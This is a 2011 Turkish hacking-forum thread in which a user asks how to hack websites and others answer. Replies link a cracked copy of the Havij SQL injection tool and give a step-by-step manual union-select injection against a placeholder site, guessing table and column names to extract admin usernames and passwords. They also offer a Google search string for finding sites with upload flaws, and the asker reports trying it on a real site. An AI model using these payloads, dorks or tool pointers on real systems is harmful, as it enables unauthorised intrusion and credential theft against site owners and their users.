- 12 Eki 2011
- 25
- 0
site hacklerken hangi programı kullanıyorsunuz yardım
site hacklerken hangi programı kullanıyorsunuz yardım
- Konbuyu başlatan MajestiC TC
- Başlangıç tarihi
- 12 Eki 2011
- 25
- 0
hmm bilgi için sağlun bazı ları site hackliyorlarda nasıl yapıyorlar acaba mrkdn actım konuyu yani 
öyle bi program olsa dünyada site kalmaz
sadece bazı programlar var mesela havij sitede sql açığı bulursun havijle taratarak admin adına şifresine ulaşırsn...
mesela active perl exploitleri onunla kullanabilirsin(başka işlevi varsa bilmiyorum ben exploit açmak için kullanıyorum)
HAVİJİ İNDİR BENCE İŞİNE YARAR
BURADAN İNDİREBİLİRSİN:http://www.turkhackteam.net/hack-videolari/573593-havij-son-surum-1-15-cracked.html
BUDA FORUMDAKİ HAVİJ KULLANIMIYLA İLGİLİ EN İYİ ANLATIM:http://www.turkhackteam.net/hack-vi...hacklemek-havij-kullanim-indirmeden-izle.html
sadece bazı programlar var mesela havij sitede sql açığı bulursun havijle taratarak admin adına şifresine ulaşırsn...
mesela active perl exploitleri onunla kullanabilirsin(başka işlevi varsa bilmiyorum ben exploit açmak için kullanıyorum)
HAVİJİ İNDİR BENCE İŞİNE YARAR
BURADAN İNDİREBİLİRSİN:http://www.turkhackteam.net/hack-videolari/573593-havij-son-surum-1-15-cracked.html
BUDA FORUMDAKİ HAVİJ KULLANIMIYLA İLGİLİ EN İYİ ANLATIM:http://www.turkhackteam.net/hack-vi...hacklemek-havij-kullanim-indirmeden-izle.html
- 12 Eki 2011
- 25
- 0
cok teşekürler hepinize teşşekür butonuna bastım
Ellede Yapabilirsin Siteye Hata Verdir
Örn: Sql İnjection'da version bulmayı önceki yazılarda anlatmıştım. Şimdi version bulduktan sonra izleyeceğimiz yol versiona göre değişir. Bu yazıda 4 versionu anlatacağım. Version 4 de olay tahmin işidir. Table ve column adlarını tahmin ederek veri çekebiliriz. Biraz sabır işi ancak uğraşınca işin zevkine varacaksınız. Hemen örnekleyelim ve sayılar şöyle ekrana yansımış olsun;
-orneksite.com/ders.php?id=-1+union+select+1,2,3,4,5,6--
(Şimdi "from" komutunu kullanarak table adını bulup veri çekeceğiz)
-orneksite.com/ders.php?id=-1+union+select+1,2,3,4,5,6+from+admin--
(admin bilgilerinin bulunduğu table'ı bulmamız gerekiyor. İlk olarak admin denedim. Site hata verdi ve sayılar ekrana yansımadı)
-orneksite.com/ders.php?id=-1+union+select+1,2,3,4,5,6+from+admins--
(yine sayılar ekrana yansımadı. Sayılar ekrana yansıyana kadar devam edeceğiz.)
orneksite.com/ders.php?id=-1+union+select+1,2,3,4,5,6+from+user--
(Hala yansımadı.)
orneksite.com/ders.php?id=-1+union+select+1,2,3,4,5,6+from+users--
(Evet şimdi sayılar ekrana yansıdı.Sizde sayılar ekrana yansımazsa "member,members,administrator,administrator vs." gibi türetin.Diyelim ki 3 ve 5 ekrana yansıdı. 3'ün veya 5'in yerine kolon adlarını yazarak kolon adlarını tahmin edeceğiz.) Şöyle ki;
-orneksite.com/ders.php?id=-1+union+select+1,2,username,4,5,6+from+users--
(hata verdi o zaman değiştiriyoruz)
-orneksite.com/ders.php?id=-1+union+select+1,2,kullaniciadi,4,5,6+from+users--
(kullanıcı adı çıktı.Şimdi şifreye geçelim)
-orneksite.com/ders.php?id=-1+union+select+1,2,kullaniciadi,4,kullanicisifre,6+from+users--
(şifre ve kullanıcı adı çıktı.)
Örn: Sql İnjection'da version bulmayı önceki yazılarda anlatmıştım. Şimdi version bulduktan sonra izleyeceğimiz yol versiona göre değişir. Bu yazıda 4 versionu anlatacağım. Version 4 de olay tahmin işidir. Table ve column adlarını tahmin ederek veri çekebiliriz. Biraz sabır işi ancak uğraşınca işin zevkine varacaksınız. Hemen örnekleyelim ve sayılar şöyle ekrana yansımış olsun;
-orneksite.com/ders.php?id=-1+union+select+1,2,3,4,5,6--
(Şimdi "from" komutunu kullanarak table adını bulup veri çekeceğiz)
-orneksite.com/ders.php?id=-1+union+select+1,2,3,4,5,6+from+admin--
(admin bilgilerinin bulunduğu table'ı bulmamız gerekiyor. İlk olarak admin denedim. Site hata verdi ve sayılar ekrana yansımadı)
-orneksite.com/ders.php?id=-1+union+select+1,2,3,4,5,6+from+admins--
(yine sayılar ekrana yansımadı. Sayılar ekrana yansıyana kadar devam edeceğiz.)
orneksite.com/ders.php?id=-1+union+select+1,2,3,4,5,6+from+user--
(Hala yansımadı.)
orneksite.com/ders.php?id=-1+union+select+1,2,3,4,5,6+from+users--
(Evet şimdi sayılar ekrana yansıdı.Sizde sayılar ekrana yansımazsa "member,members,administrator,administrator vs." gibi türetin.Diyelim ki 3 ve 5 ekrana yansıdı. 3'ün veya 5'in yerine kolon adlarını yazarak kolon adlarını tahmin edeceğiz.) Şöyle ki;
-orneksite.com/ders.php?id=-1+union+select+1,2,username,4,5,6+from+users--
(hata verdi o zaman değiştiriyoruz)
-orneksite.com/ders.php?id=-1+union+select+1,2,kullaniciadi,4,5,6+from+users--
(kullanıcı adı çıktı.Şimdi şifreye geçelim)
-orneksite.com/ders.php?id=-1+union+select+1,2,kullaniciadi,4,kullanicisifre,6+from+users--
(şifre ve kullanıcı adı çıktı.)
Sql injection manuel olarak da yapılabilir,havij kullanarak da
Havij 1,14 + Crack Buradan İndirebilirsin
Havij kullanımı hakkında bir video çekmiştim onuda buradan izleyebilirsin
Havij İle Hack
Exploit kullarak da sql injection yapabilirsin bunun için bir video çekmiştim buradan izleyebilirsin.
Exploit Kullanarak Sql İnjection
Manuel olarak yapmayida videolu şekilde anlattim hadi gene iyisin
Sql İnjectionda Acces
Havij 1,14 + Crack Buradan İndirebilirsin
Havij kullanımı hakkında bir video çekmiştim onuda buradan izleyebilirsin
Havij İle Hack
Exploit kullarak da sql injection yapabilirsin bunun için bir video çekmiştim buradan izleyebilirsin.
Exploit Kullanarak Sql İnjection
Manuel olarak yapmayida videolu şekilde anlattim hadi gene iyisin
Sql İnjectionda Acces
- 12 Eki 2011
- 25
- 0
vla süpersiniz teşşekürler botunu cok calıstı
teşşekürler botunu cok calıstı kardeşime çok katılıyorum manuel her zaman doğru sonucu verir
2. hususa geçicek olursa
upload açığı olan sitelerden başla derim
googleden bu kodu arat
"inurl:rte/my_********s/my_files/"
sonra bu kodu yapıştır
örnek
Attach File Properties
bu şekilde
kolay gelsin
- 12 Eki 2011
- 25
- 0
margu bende hack videosunu izledim sonuc 0 program güzel işe yarıyor ama siteyide buldum sonuna +order+by+1 2 3 4 5 6 7 denedim 12345 hata almadım ama 6-7 de alıdm
sonra union+select+0,1,2,3,4,5,6,7+from+user yazdım union+select+0,1,2,3,4,username,password,7+from+user yazdım yine olmadı değişik olabilir yazmısın sadece sitede 2 tane tablo vardı user 2 admin 2 sinidedenedm olmadı nyse yine sağol
sonra union+select+0,1,2,3,4,5,6,7+from+user yazdım union+select+0,1,2,3,4,username,password,7+from+user yazdım yine olmadı değişik olabilir yazmısın sadece sitede 2 tane tablo vardı user 2 admin 2 sinidedenedm olmadı nyse yine sağol
- Durum
